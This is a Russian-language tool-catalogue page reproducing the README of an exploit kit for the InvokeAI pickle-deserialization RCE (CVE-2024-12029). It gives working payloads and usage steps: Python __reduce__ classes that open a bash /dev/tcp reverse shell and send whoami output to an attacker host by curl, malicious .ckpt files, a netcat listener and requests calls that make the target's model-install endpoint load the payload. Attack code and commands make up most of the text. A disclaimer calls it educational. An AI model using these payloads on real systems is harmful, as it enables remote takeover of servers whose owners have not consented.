Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods. | Kitploit
Инструменты/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access ToolPayload Development

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods.

Репозиторий
4 месяцев назадЕщё не проверено

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

Альтернативный подход: Reverse Shell и тест обратного вызова

Обзор

Этот репозиторий содержит альтернативные подходы к созданию полезных нагрузок для уязвимости RCE в InvokeAI (CVE-2024-12029), когда внедрение SSH-ключа не срабатывает. Полезные нагрузки предназначены для проверки того, действительно ли происходит десериализация pickle, и для предоставления альтернативных методов доступа.

Постановка проблемы

Когда полезные нагрузки с внедрением SSH-ключа успешно доставляются (статус 201), но для SSH-доступа по-прежнему требуется пароль, это указывает на одно из следующих:

  1. Десериализация pickle не происходит
  2. Команды блокируются или выполняются в песочнице
  3. Метод выполнения несовместим

Решение: альтернативные полезные нагрузки

📁 Файлы полезных нагрузок

Полезные нагрузки Reverse Shell

  • payload_reverse_bash.ckpt (89 байт) — Bash reverse shell
  • payload_reverse_python.ckpt (267 байт) — Python reverse shell
  • payload_reverse_nc.ckpt (70 байт) — Netcat reverse shell

Тестовые и проверочные полезные нагрузки

  • payload_callback_test.ckpt (115 байт) — HTTP-колбэк для проверки десериализации
  • payload_test.ckpt (90 байт) — простой тест создания файла
  • payload_alt_exec.ckpt (223 байта) — альтернативный метод выполнения

SSH-полезные нагрузки (для справки)

  • payload_ssh_simple.ckpt (271 байт) — внедрение SSH-ключа, совместимое с Linux

🛠️ Тестовые скрипты

Тестовые скрипты для Kali

  • kali_reverse_test.py — комплексный набор тестов

Генераторы полезных нагрузок

  • reverse_shell_payload.py — генерация полезных нагрузок reverse shell

🚀 Быстрое использование

1. Запуск сервера полезных нагрузок

root@kitploit:~
python web_server.py --port 8000

2. Тест обратного вызова (рекомендуется сначала)

root@kitploit:~
# Copy kali_reverse_test.py to Kali and run:
python3 kali_reverse_test.py
# Choose option 1 to test callback

3. Проверка Reverse Shell

root@kitploit:~
# Start listener on Kali:
nc -lvnp 4444

# Send reverse shell payload:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. Проверка простого выполнения

root@kitploit:~
# Test basic command execution:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# Verify file creation:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 Интерпретация результатов тестов

✅ Успешный тест обратного вызова

  • Что это значит: десериализация pickle работает
  • Следующий шаг: попробуйте reverse shell или альтернативные SSH-полезные нагрузки
  • Проверка: журналы веб-сервера на предмет HTTP-колбэка

✅ Успешная работа Reverse Shell

  • Что это значит: команды выполняются и сетевой доступ работает
  • Результат: прямой доступ к оболочке через прослушиватель netcat
  • Следующий шаг: используйте reverse shell для дальнейшей эксплуатации

✅ Тестовый файл создан

  • Что это значит: работает базовое выполнение команд
  • Следующий шаг: попробуйте альтернативные методы внедрения SSH
  • Проверка: /tmp/payload_test.txt на целевой системе

Callback-полезная нагрузка

root@kitploit:~
class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

Полезная нагрузка Reverse Shell

root@kitploit:~
class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

Тестовая полезная нагрузка

root@kitploit:~
class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 Ссылки

  • CVE-2024-12029: удалённое выполнение кода в InvokeAI
  • Небезопасная десериализация PyTorch: уязвимость torch.load()
  • Pickle reduce: эксплуатация сериализации объектов Python

⚠️ Отказ от ответственности

Этот репозиторий предназначен только для образовательных целей и авторизованного тестирования безопасности. Пользователи несут ответственность за получение надлежащего разрешения перед тестированием любых систем.

Скачать инструмент